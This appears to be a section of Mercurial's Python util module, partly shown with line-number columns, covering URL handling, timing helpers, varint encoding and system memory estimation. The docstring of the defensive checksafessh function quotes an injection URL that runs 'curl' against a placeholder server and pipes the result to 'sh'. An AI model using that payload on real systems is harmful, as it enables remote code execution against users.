3187 3198 s += urlreq.quote(self.user, safe=self._safechars)
3188 3199 if self.passwd:
3189 3200 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3190 3201 if self.user or self.passwd:
3191 3202 s += b'@'
3192 3203 if self.host:
3193 3204 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3194 3205 s += urlreq.quote(self.host)
3195 3206 else:
3196 3207 s += self.host
3197 3208 if self.port:
3198 3209 s += b':' + urlreq.quote(self.port)
3199 3210 if self.host:
3200 3211 s += b'/'
3201 3212 if self.path:
3202 3213 # TODO: similar to the query string, we should not unescape the
3203 3214 # path when we store it, the path might contain '%2f' = '/',
3204 3215 # which we should *not* escape.
3205 3216 s += urlreq.quote(self.path, safe=self._safepchars)
3206 3217 if self.query:
3207 3218 # we store the query in escaped form.
3208 3219 s += b'?' + self.query
3209 3220 if self.fragment is not None:
3210 3221 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3211 3222 return s
3212 3223
3213 3224 __str__ = encoding.strmethod(__bytes__)
3214 3225
3215 3226 def authinfo(self):
3216 3227 user, passwd = self.user, self.passwd
3217 3228 try:
3218 3229 self.user, self.passwd = None, None
3219 3230 s = bytes(self)
3220 3231 finally:
3221 3232 self.user, self.passwd = user, passwd
3222 3233 if not self.user:
3223 3234 return (s, None)
3224 3235 # authinfo[1] is passed to urllib2 password manager, and its
3225 3236 # URIs must not contain credentials. The host is passed in the
3226 3237 # URIs list because Python < 2.4.3 uses only that to search for
3227 3238 # a password.
3228 3239 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3229 3240
3230 3241 def isabs(self):
3231 3242 if self.scheme and self.scheme != b'file':
3232 3243 return True # remote URL
3233 3244 if hasdriveletter(self.path):
3234 3245 return True # absolute for our purposes - can't be joined()
3235 3246 if self.path.startswith(br'\\'):
3236 3247 return True # Windows UNC path
3237 3248 if self.path.startswith(b'/'):
3238 3249 return True # POSIX-style
3239 3250 return False
3240 3251
3241 3252 def localpath(self):
3242 3253 if self.scheme == b'file' or self.scheme == b'bundle':
3243 3254 path = self.path or b'/'
3244 3255 # For Windows, we need to promote hosts containing drive
3245 3256 # letters to paths with drive letters.
3246 3257 if hasdriveletter(self._hostport):
3247 3258 path = self._hostport + b'/' + self.path
3248 3259 elif (
3249 3260 self.host is not None and self.path and not hasdriveletter(path)
3250 3261 ):
3251 3262 path = b'/' + path
3252 3263 return path
3253 3264 return self._origpath
3254 3265
3255 3266 def islocal(self):
3256 3267 '''whether localpath will return something that posixfile can open'''
3257 3268 return (
3258 3269 not self.scheme
3259 3270 or self.scheme == b'file'
3260 3271 or self.scheme == b'bundle'
3261 3272 )
3262 3273
3263 3274
3264 3275 def hasscheme(path):
3265 3276 return bool(url(path).scheme)
3266 3277
3267 3278
3268 3279 def hasdriveletter(path):
3269 3280 return path and path[1:2] == b':' and path[0:1].isalpha()
3270 3281
3271 3282
3272 3283 def urllocalpath(path):
3273 3284 return url(path, parsequery=False, parsefragment=False).localpath()
3274 3285
3275 3286
3276 3287 def checksafessh(path):
3277 3288 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3278 3289
3279 3290 This is a sanity check for ssh urls. ssh will parse the first item as
3280 3291 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3281 3292 Let's prevent these potentially exploited urls entirely and warn the
3282 3293 user.
3283 3294
3284 3295 Raises an error.Abort when the url is unsafe.
3285 3296 """
3286 3297 path = urlreq.unquote(path)
3287 3298 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3288 3299 raise error.Abort(
3289 3300 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3290 3301 )
3291 3302
3292 3303
3293 3304 def hidepassword(u):
3294 3305 '''hide user credential in a url string'''
3295 3306 u = url(u)
3296 3307 if u.passwd:
3297 3308 u.passwd = b'***'
3298 3309 return bytes(u)
3299 3310
3300 3311
3301 3312 def removeauth(u):
3302 3313 '''remove all authentication information from a url string'''
3303 3314 u = url(u)
3304 3315 u.user = u.passwd = None
3305 3316 return bytes(u)
3306 3317
3307 3318
3308 3319 timecount = unitcountfn(
3309 3320 (1, 1e3, _(b'%.0f s')),
3310 3321 (100, 1, _(b'%.1f s')),
3311 3322 (10, 1, _(b'%.2f s')),
3312 3323 (1, 1, _(b'%.3f s')),
3313 3324 (100, 0.001, _(b'%.1f ms')),
3314 3325 (10, 0.001, _(b'%.2f ms')),
3315 3326 (1, 0.001, _(b'%.3f ms')),
3316 3327 (100, 0.000001, _(b'%.1f us')),
3317 3328 (10, 0.000001, _(b'%.2f us')),
3318 3329 (1, 0.000001, _(b'%.3f us')),
3319 3330 (100, 0.000000001, _(b'%.1f ns')),
3320 3331 (10, 0.000000001, _(b'%.2f ns')),
3321 3332 (1, 0.000000001, _(b'%.3f ns')),
3322 3333 )
3323 3334
3324 3335
3325 3336 @attr.s
3326 3337 class timedcmstats(object):
3327 3338 """Stats information produced by the timedcm context manager on entering."""
3328 3339
3329 3340 # the starting value of the timer as a float (meaning and resolution are
3330 3341 # platform dependent, see util.timer)
3331 3342 start = attr.ib(default=attr.Factory(lambda: timer()))
3332 3343 # the number of seconds as a floating point value; starts at 0, updated when
3333 3344 # the context is exited.
3334 3345 elapsed = attr.ib(default=0)
3335 3346 # the number of nested timedcm context managers.
3336 3347 level = attr.ib(default=1)
3337 3348
3338 3349 def __bytes__(self):
3339 3350 return timecount(self.elapsed) if self.elapsed else b'<unknown>'
3340 3351
3341 3352 __str__ = encoding.strmethod(__bytes__)
3342 3353
3343 3354
3344 3355 @contextlib.contextmanager
3345 3356 def timedcm(whencefmt, *whenceargs):
3346 3357 """A context manager that produces timing information for a given context.
3347 3358
3348 3359 On entering, a timedcmstats instance is produced.
3349 3360
3350 3361 This context manager is reentrant.
3351 3362
3352 3363 """
3353 3364 # track nested context managers
3354 3365 timedcm._nested += 1
3355 3366 timing_stats = timedcmstats(level=timedcm._nested)
3356 3367 try:
3357 3368 with tracing.log(whencefmt, *whenceargs):
3358 3369 yield timing_stats
3359 3370 finally:
3360 3371 timing_stats.elapsed = timer() - timing_stats.start
3361 3372 timedcm._nested -= 1
3362 3373
3363 3374
3364 3375 timedcm._nested = 0
3365 3376
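# Hedged usage sketch (the timed operation is hypothetical): the yielded
# stats object is updated in place, so elapsed is valid after the block.
#
#   with timedcm(b'loading %s', b'manifest') as stats:
#       load_manifest()
#   procutil.stderr.write(b'%s\n' % bytes(stats))   # e.g. '12.3 ms'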
3366 3377
3367 3378 def timed(func):
3368 3379 """Report the execution time of a function call to stderr.
3369 3380
3370 3381 During development, use as a decorator when you need to measure
3371 3382 the cost of a function, e.g. as follows:
3372 3383
3373 3384 @util.timed
3374 3385 def foo(a, b, c):
3375 3386 pass
3376 3387 """
3377 3388
3378 3389 def wrapper(*args, **kwargs):
3379 3390 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3380 3391 result = func(*args, **kwargs)
3381 3392 stderr = procutil.stderr
3382 3393 stderr.write(
3383 3394 b'%s%s: %s\n'
3384 3395 % (
3385 3396 b' ' * time_stats.level * 2,
3386 3397 pycompat.bytestr(func.__name__),
3387 3398 time_stats,
3388 3399 )
3389 3400 )
3390 3401 return result
3391 3402
3392 3403 return wrapper
3393 3404
3394 3405
3395 3406 _sizeunits = (
3396 3407 (b'm', 2 ** 20),
3397 3408 (b'k', 2 ** 10),
3398 3409 (b'g', 2 ** 30),
3399 3410 (b'kb', 2 ** 10),
3400 3411 (b'mb', 2 ** 20),
3401 3412 (b'gb', 2 ** 30),
3402 3413 (b'b', 1),
3403 3414 )
3404 3415
3405 3416
3406 3417 def sizetoint(s):
3407 3418 """Convert a space specifier to a byte count.
3408 3419
3409 3420 >>> sizetoint(b'30')
3410 3421 30
3411 3422 >>> sizetoint(b'2.2kb')
3412 3423 2252
3413 3424 >>> sizetoint(b'6M')
3414 3425 6291456
3415 3426 """
3416 3427 t = s.strip().lower()
3417 3428 try:
3418 3429 for k, u in _sizeunits:
3419 3430 if t.endswith(k):
3420 3431 return int(float(t[: -len(k)]) * u)
3421 3432 return int(t)
3422 3433 except ValueError:
3423 3434 raise error.ParseError(_(b"couldn't parse size: %s") % s)
3424 3435
3425 3436
3426 3437 class hooks(object):
3427 3438 """A collection of hook functions that can be used to extend a
3428 3439 function's behavior. Hooks are called in lexicographic order,
3429 3440 based on the names of their sources."""
3430 3441
3431 3442 def __init__(self):
3432 3443 self._hooks = []
3433 3444
3434 3445 def add(self, source, hook):
3435 3446 self._hooks.append((source, hook))
3436 3447
3437 3448 def __call__(self, *args):
3438 3449 self._hooks.sort(key=lambda x: x[0])
3439 3450 results = []
3440 3451 for source, hook in self._hooks:
3441 3452 results.append(hook(*args))
3442 3453 return results
3443 3454
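# Hypothetical usage sketch: callers register under a source name, and
# invocation runs the hooks sorted by that name.
#
#   h = hooks()
#   h.add(b'b-ext', lambda repo: b'second')
#   h.add(b'a-ext', lambda repo: b'first')
#   h(repo)   # -> [b'first', b'second']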
3444 3455
3445 3456 def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
3446 3457 """Yields lines for a nicely formatted stacktrace.
3447 3458 Skips the last 'skip' entries, then returns the last 'depth' entries.
3448 3459 Each file+linenumber is formatted according to fileline.
3449 3460 Each line is formatted according to line.
3450 3461 If line is None, it yields:
3451 3462 length of longest filepath+line number,
3452 3463 filepath+linenumber,
3453 3464 function
3454 3465
3455 3466 Not to be used in production code, but very convenient while developing.
3456 3467 """
3457 3468 entries = [
3458 3469 (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3459 3470 for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
3460 3471 ][-depth:]
3461 3472 if entries:
3462 3473 fnmax = max(len(entry[0]) for entry in entries)
3463 3474 for fnln, func in entries:
3464 3475 if line is None:
3465 3476 yield (fnmax, fnln, func)
3466 3477 else:
3467 3478 yield line % (fnmax, fnln, func)
3468 3479
3469 3480
3470 3481 def debugstacktrace(
3471 3482 msg=b'stacktrace',
3472 3483 skip=0,
3473 3484 f=procutil.stderr,
3474 3485 otherf=procutil.stdout,
3475 3486 depth=0,
3476 3487 prefix=b'',
3477 3488 ):
3478 3489 """Writes a message to f (stderr) with a nicely formatted stacktrace.
3479 3490 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
3480 3491 By default it will flush stdout first.
3481 3492 It can be used everywhere and intentionally does not require an ui object.
3482 3493 Not be used in production code but very convenient while developing.
3483 3494 """
3484 3495 if otherf:
3485 3496 otherf.flush()
3486 3497 f.write(b'%s%s at:\n' % (prefix, msg.rstrip()))
3487 3498 for line in getstackframes(skip + 1, depth=depth):
3488 3499 f.write(prefix + line)
3489 3500 f.flush()
3490 3501
3491 3502
3492 3503 # convenient shortcut
3493 3504 dst = debugstacktrace


def safename(f, tag, ctx, others=None):
    """
    Generate a name that is safe to rename f to in the given context.

    f: filename to rename
    tag: a string tag that will be included in the new name
    ctx: a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    if others is None:
        others = set()

    fn = b'%s~%s' % (f, tag)
    if fn not in ctx and fn not in others:
        return fn
    for n in itertools.count(1):
        fn = b'%s~%s~%s' % (f, tag, n)
        if fn not in ctx and fn not in others:
            return fn


def readexactly(stream, n):
    '''read n bytes from stream.read and abort if fewer were available'''
    s = stream.read(n)
    if len(s) < n:
        raise error.Abort(
            _(b"stream ended unexpectedly (got %d bytes, expected %d)")
            % (len(s), n)
        )
    return s
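

# Illustrative sketch (not part of the original module):
#
#     from io import BytesIO
#     readexactly(BytesIO(b'abcdef'), 3)  # -> b'abc'
#     readexactly(BytesIO(b'ab'), 3)      # raises error.Abort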


def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the value's binary representation, least significant
    group first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
    bits = value & 0x7F
    value >>= 7
    bytes = []
    while value:
        bytes.append(pycompat.bytechr(0x80 | bits))
        bits = value & 0x7F
        value >>= 7
    bytes.append(pycompat.bytechr(bits))

    return b''.join(bytes)
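

# Byte-layout sketch (added for illustration): for 1337 (0b101_0011_1001),
# the low 7 bits 0b0111001 (0x39) are emitted first with the continuation
# bit set (0x80 | 0x39 = 0xb9); the remaining bits, 1337 >> 7 = 10 (0x0a),
# form the final byte with the high bit clear, giving b'\xb9\x0a'.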


def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    result = 0
    shift = 0
    while True:
        byte = ord(readexactly(fh, 1))
        result |= (byte & 0x7F) << shift
        if not (byte & 0x80):
            return result
        shift += 7
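

# Round-trip sketch (added for illustration): decoding an encoded value
# recovers the original integer.
#
#     from io import BytesIO
#     uvarintdecodestream(BytesIO(uvarintencode(65536)))  # -> 65536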


# Passing the '' locale means that the locale should be set according to the
# user settings (environment variables).
# Python sometimes avoids setting the global locale settings. When interfacing
# with C code (e.g. the curses module or the Subversion bindings), the global
# locale settings must be initialized correctly. Python 2 does not initialize
# the global locale settings on interpreter startup. Python 3 sometimes
# initializes LC_CTYPE, but not consistently at least on Windows. Therefore we
# explicitly initialize it to get consistent behavior if it's not already
# initialized. Since CPython commit 177d921c8c03d30daa32994362023f777624b10d,
# LC_CTYPE is always initialized. If we require Python 3.8+, we should re-check
# if we can remove this code.
@contextlib.contextmanager
def with_lc_ctype():
    oldloc = locale.setlocale(locale.LC_CTYPE, None)
    if oldloc == 'C':
        try:
            try:
                locale.setlocale(locale.LC_CTYPE, '')
            except locale.Error:
                # The likely case is that the locale from the environment
                # variables is unknown.
                pass
            yield
        finally:
            locale.setlocale(locale.LC_CTYPE, oldloc)
    else:
        yield
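

# Usage sketch (added for illustration): wrap calls into locale-sensitive C
# code (e.g. the curses module) so LC_CTYPE matches the user's environment
# and is restored afterwards:
#
#     with with_lc_ctype():
#         ...  # call into C code that consults the global locale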


def _estimatememory():
    """Provide an estimate for the available system memory in Bytes.

    If no estimate can be provided on the platform, returns None.
    """
    if pycompat.sysplatform.startswith(b'win'):
        # On Windows, use the GlobalMemoryStatusEx kernel function directly.
        from ctypes import c_long as DWORD, c_ulonglong as DWORDLONG

        # Structure, byref, sizeof and windll live in ctypes itself, not in
        # ctypes.wintypes; importing them from ctypes.wintypes raises
        # ImportError.
        from ctypes import Structure, byref, sizeof, windll

        class MEMORYSTATUSEX(Structure):
            _fields_ = [
                ('dwLength', DWORD),
                ('dwMemoryLoad', DWORD),
                ('ullTotalPhys', DWORDLONG),
                ('ullAvailPhys', DWORDLONG),
                ('ullTotalPageFile', DWORDLONG),
                ('ullAvailPageFile', DWORDLONG),
                ('ullTotalVirtual', DWORDLONG),
                ('ullAvailVirtual', DWORDLONG),
                ('ullExtendedVirtual', DWORDLONG),
            ]

        x = MEMORYSTATUSEX()
        x.dwLength = sizeof(x)
        windll.kernel32.GlobalMemoryStatusEx(byref(x))
        return x.ullAvailPhys

    # On newer Unix-like systems and macOS, the sysconf interface
    # can be used. _SC_PAGE_SIZE is part of POSIX; _SC_PHYS_PAGES
    # seems to be implemented on most systems.
    try:
        pagesize = os.sysconf(os.sysconf_names['SC_PAGE_SIZE'])
        pages = os.sysconf(os.sysconf_names['SC_PHYS_PAGES'])
        return pagesize * pages
    except OSError:  # sysconf can fail
        pass
    except KeyError:  # unknown parameter
        pass
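

# Illustrative check (added for illustration; the value varies per machine,
# and None is returned when neither probe applies):
#
#     mem = _estimatememory()
#     if mem is not None:
#         procutil.stderr.write(b'~%d MiB\n' % (mem // (2 ** 20)))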